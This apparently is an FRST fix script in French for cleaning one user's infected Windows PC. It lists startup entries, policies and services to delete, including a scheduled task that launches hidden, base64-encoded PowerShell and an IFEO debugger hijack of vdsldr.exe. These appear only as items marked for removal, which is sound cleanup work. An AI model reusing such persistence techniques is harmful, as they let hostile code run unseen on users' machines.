start::
closeprocesses:
createrestorepoint:
cmd: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s
cmd: reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall" /s
Avast Update Helper (HKLM-x32\...\{19C3AB22-3718-4E4D-B203-242F5001565B}) (Version: 1.8.1206.2 - AVAST Software) Hidden
CustomCLSID: HKU\S-1-5-21-3747113201-3398704821-205741979-1001_Classes\CLSID\{2F81B25E-7507-4844-BFF2-77D2CC24CED4}\localserver32 -> "C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" -ToastActivated => Pas de fichier
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\StartupApproved\Run: => "AvastBrowserAutoLaunch_2803A90FFDA3F69244EFC38730BEF846"
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [Steam] => "A:\Steam\steam.exe" -silent (Pas de fichier)
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [EADM] => "A:\Origin\Origin.exe" -AutoStart (Pas de fichier)
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [RestMinder] => C:\Users\brend\AppData\Local\Programs\RestMinder\RestMinder.exe [199232 2021-09-06] (Globalhop Ltd -> ) <==== ATTENTION
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [AvastBrowserAutoLaunch_2803A90FFDA3F69244EFC38730BEF846] => "C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe" --check-run=src=logon --auto-launch-at-startup --profile-directory="Default" (Pas de fichier)
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [Energy] => C:\Users\brend\AppData\Roaming\Energy\Energy.exe [134335810 2022-05-15] (EnergyApplication) [Fichier non signé] <==== ATTENTION
C:\Users\brend\AppData\Roaming\Energy
C:\Users\brend\AppData\Local\Programs\RestMinder
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [Facebook.MessengerDesktop] => C:\Users\brend\AppData\Local\Programs\Messenger\Messenger.exe messenger://openAtLogin (Pas de fichier)
C:\Users\brend\AppData\Local\Programs\Messenger
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [RestMinder] => C:\Users\brend\AppData\Local\Programs\RestMinder\RestMinder.exe [199232 2021-09-06] (Globalhop Ltd -> ) <==== ATTENTION
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [AvastBrowserAutoLaunch_2803A90FFDA3F69244EFC38730BEF846] => "C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe" --check-run=src=logon --auto-launch-at-startup --profile-directory="Default" (Pas de fichier)
HKU\S-1-5-21-3747113201-3398704821-205741979-1001\...\Run: [Energy] => C:\Users\brend\AppData\Roaming\Energy\Energy.exe [134335810 2022-05-15] (EnergyApplication) [Fichier non signé] <==== ATTENTION
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] ->
IFEO\vdsldr.exe: [Debugger] cmd /q (c) AveYo, 2021 /d/x/r>nul (erase /f/s/q %systemdrive%\$windows.~bt\appraiserres.dll&md 11&cd 11&ren vd.exe vdsldr.exe&robocopy "../" "./" "vdsldr.exe"&ren vdsldr.exe vd.exe&start vd -Embedding)&rem;
Startup: C:\Users\brend\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk [2021-09-14]
ShortcutTarget: IMVU.lnk -> C:\Users\brend\AppData\Roaming\IMVUClient\IMVUQualityAgent.exe (Pas de fichier)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {2E014B1F-5B06-4B56-ABCF-21D2CD3C7091} - System32\Tasks\chrome view => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJABqAGQAIAA9ACAAJABuAHUAbABsADsACgAkAGoAcAA9ACQAbgB1AGwAbAA7AAoACgAkAGEAcwBjAEUAbgBjAFQAeAB0AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoACgBmAHUAbgBjAHQAaQBvAG4AIABnAGUAdABJAHQAZQBtACgAWwBzAHQAcgBpAG4AZwBdAC (l'élément de données a 4995 caractères en plus). <==== ATTENTION
Task: {95DD20B5-57D1-4739-BAF2-14F2C184BE3E} - System32\Tasks\Avast Secure Browser Heartbeat Task (Logon) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe --type=heartbeat --logon (Pas de fichier)
Task: {AA2FB8FD-BC2B-4D73-BF5F-E2A7A38C0E3A} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /c (Pas de fichier)
Task: {BC6070B0-8EC5-4E28-BA2A-BA669B236FAD} - System32\Tasks\Avast Secure Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe --type=heartbeat --hourly (Pas de fichier)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (Pas de fichier)
Task: {DED2D67E-A137-4C7F-ACCA-F9F81CCED109} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /ua /installsource scheduler (Pas de fichier)
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
FF Plugin: @java.com/DTPlugin,version=11.211.2 -> C:\Program Files\Java\jre1.8.0_211\bin\dtplugin\npDeployJava1.dll [2019-05-08] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.211.2 -> C:\Program Files\Java\jre1.8.0_211\bin\plugin2\npjp2.dll [2019-05-08] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.211.2 -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\dtplugin\npDeployJava1.dll [2019-05-08] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.211.2 -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\plugin2\npjp2.dll [2019-05-08] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=3 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1206.2\npAvastBrowserUpdate3.dll [Pas de fichier]
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=9 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1206.2\npAvastBrowserUpdate3.dll [Pas de fichier]
FF Plugin-x32: @vlcstreamer.com/VLCStreamer Update;version=3 -> C:\Program Files (x86)\VLCStreamer\Update\1.3.99.0\npVLCStreamerUpdate3.dll [Pas de fichier]
FF Plugin-x32: @vlcstreamer.com/VLCStreamer Update;version=9 -> C:\Program Files (x86)\VLCStreamer\Update\1.3.99.0\npVLCStreamerUpdate3.dll [Pas de fichier]
S2 avast; "C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe" /svc [X]
S3 avastm; "C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe" /medsvc [X]
S3 AvastSecureBrowserElevationService; "C:\Program Files (x86)\AVAST Software\Browser\Application\101.0.16113.42\elevation_service.exe" [X]
S3 R0RazerSynapseService; \??\C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.sys [X]
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
S3 wtbt; \??\f:\jeux\steamapps\common\super people playtest\engine\binaries\thirdparty\wondertrust\wtdrv64.sys [X]
cmd: netsh advfirewall reset
emptytemp:
end::